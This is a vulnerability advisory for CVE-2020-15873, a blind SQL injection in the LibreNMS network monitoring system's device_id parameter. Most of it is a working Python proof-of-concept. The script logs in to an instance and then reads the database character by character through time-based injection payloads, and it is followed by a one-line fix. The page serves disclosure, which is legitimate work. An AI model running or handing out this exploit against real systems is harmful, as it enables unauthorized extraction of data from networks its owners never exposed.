CVE-2020-15873: Blind SQL Injection in LibreNMS

Blind SQL Injection in LibreNMS

CVE Number

CVE-2020-15873

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Product Details

LibreNMS is an autodiscovering PHP/MySQL/SNMP-based network monitoring system that includes support for a wide range of network hardware and operating systems, including Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP and many more.


Vulnerable Versions


Vulnerability Details

LibreNMS is vulnerable to blind SQL injection. Because the application does not protect the device_id POST parameter against SQL injection, an authenticated attacker can inject malicious SQL into the query built from it. Through this flaw, an attacker can extract the complete contents of the database.


Steps To Reproduce:

  • POC
import requests
import sys
from bs4 import BeautifulSoup

# One session so the authenticated login cookie is reused for every request.
s = requests.Session()

def sqli(ip, inj_str):
	# Time-based blind check: try each printable ASCII code for the current
	# position; the server only sleeps (10 s) when the guessed code is right.
	for j in range(32, 126):
		target = "http://%s/ajax_form.php" % ip
		p_data = {"action": "test", "type": "customoid", "device_id": inj_str.replace("[CHAR]", str(j))}
		r = s.post(target, data=p_data)
		if round(r.elapsed.total_seconds()) > 7:
			return j
	return None

def main():
	ip = sys.argv[1]
	print("(+) Retrieving database version....")
	for i in range(1, 15):
		injection_string = "1 and if(ascii(substring((select version()),%d,1))=[CHAR],sleep(10),'bar')%%23" % i
		extracted_code = sqli(ip, injection_string)
		if extracted_code is None:
			break  # no character matched at this position, nothing more to read
		sys.stdout.write(chr(extracted_code))  # displaying data
		sys.stdout.flush()
	print("\n(+) done!")

if __name__ == "__main__":
	if len(sys.argv) != 4:
		print("(+) usage: %s <target> <username> <password>" % sys.argv[0])
		print("(+) eg: %s domain/ip username password" % sys.argv[0])
		sys.exit(1)

	# Fetch the login page to obtain the CSRF token, then authenticate.
	login_url = "http://%s/login" % sys.argv[1]
	response = s.get(login_url)
	soup = BeautifulSoup(response.text, 'html.parser')
	_token = soup.find('input')['value']  # first input on the login form is the hidden _token
	username = sys.argv[2]
	password = sys.argv[3]
	login_data = {"_token": _token, "username": username, "password": password, "remember": "on", "submit": ""}
	login = s.post(login_url, data=login_data)
	main()
  • Prerequisites:
    • Python module: bs4
  • Command: python $ ip/domain username password


An authenticated attacker can extract arbitrary data from the database.


Parameterized queries should be used.


Discovered by ACE Team – Loginsoft